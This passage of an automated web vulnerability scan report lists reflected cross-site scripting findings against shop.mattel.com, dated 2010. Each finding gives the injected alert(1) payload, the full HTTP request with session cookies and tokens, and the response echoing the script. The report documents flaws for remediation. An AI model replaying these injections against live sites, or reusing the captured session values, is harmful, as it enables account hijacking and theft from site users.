Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45700


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&locale=es_US8d597--><script>alert(1)</script>d903fe711aa -->
...[SNIP]...

1.36. http://shop.mattel.com/home/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24863"-alert(1)-"78eaf9b6a31 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US24863"-alert(1)-"78eaf9b6a31 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45652


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
= {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&locale=es_US24863"-alert(1)-"78eaf9b6a31";
   </script>
...[SNIP]...

1.37. http://shop.mattel.com/home/index.jsp [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the locale request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b57"-alert(1)-"f7a8c4aca52 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp?locale=es_USa4b57"-alert(1)-"f7a8c4aca52 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45424


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="locale=es_USa4b57"-alert(1)-"f7a8c4aca52";
   </script>
...[SNIP]...

1.38. http://shop.mattel.com/home/index.jsp [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the locale request parameter is copied into an HTML comment. The payload 2478f--><script>alert(1)</script>76d14968a7c was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?locale=es_US2478f--><script>alert(1)</script>76d14968a7c HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:59 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45472


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<!-- === Request Query String: locale=es_US2478f--><script>alert(1)</script>76d14968a7c -->
...[SNIP]...

1.39. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cd009--><script>alert(1)</script>6d63d6430fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?cd009--><script>alert(1)</script>6d63d6430fa=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:51 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45420


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<!-- === Request Query String: cd009--><script>alert(1)</script>6d63d6430fa=1 -->
...[SNIP]...

1.40. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5513"-alert(1)-"f377ef9f75a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp?a5513"-alert(1)-"f377ef9f75a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45089


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="a5513"-alert(1)-"f377ef9f75a=1";
   </script>
...[SNIP]...

1.41. http://shop.mattel.com/product/index.jsp [cp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53258"-alert(1)-"114d4ef9b54 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/index.jsp?productId=4199678&cp=3719987.3741284.374127853258"-alert(1)-"114d4ef9b54 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:45 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:52 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36580


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


               
...[SNIP]...
text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="productId=4199678&cp=3719987.3741284.374127853258"-alert(1)-"114d4ef9b54";
   </script>
...[SNIP]...

1.42. http://shop.mattel.com/product/index.jsp [cp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The value of the cp request parameter is copied into an HTML comment. The payload d67b6--><script>alert(1)</script>c8c1a5320e3 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product/index.jsp?productId=4199678&cp=3719987.3741284.3741278d67b6--><script>alert(1)</script>c8c1a5320e3 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36612


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


               
...[SNIP]...
<!-- === Request Query String: productId=4199678&cp=3719987.3741284.3741278d67b6--><script>alert(1)</script>c8c1a5320e3 -->
...[SNIP]...

1.43. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload babdb--><script>alert(1)</script>332e4ffe94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product/index.jsp?productId=4199678&babdb--><script>alert(1)</script>332e4ffe94=1 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=jsx3NSTW0ThmFQdF2nz80hkG10LQN52LGC89LfycTTn9WzHlzvxm!-1434729825; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:45 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54410


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<!-- === Request Query String: productId=4199678&babdb--><script>alert(1)</script>332e4ffe94=1 -->
...[SNIP]...

1.44. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cc08"-alert(1)-"8a2c85cf2ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/index.jsp?productId=4199678&1cc08"-alert(1)-"8a2c85cf2ad=1 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:34 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=CyQ2NSTSyvhGDxW9mLkXPrJrLljhvJTfK4WtPV9v1cD6VrL85yf1!755340761; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:41 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54343


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="productId=4199678&1cc08"-alert(1)-"8a2c85cf2ad=1";
   </script>
...[SNIP]...

1.45. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /productAlerts/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 71d78--><script>alert(1)</script>e4fc885191d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /productAlerts/index.jsp?71d78--><script>alert(1)</script>e4fc885191d=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
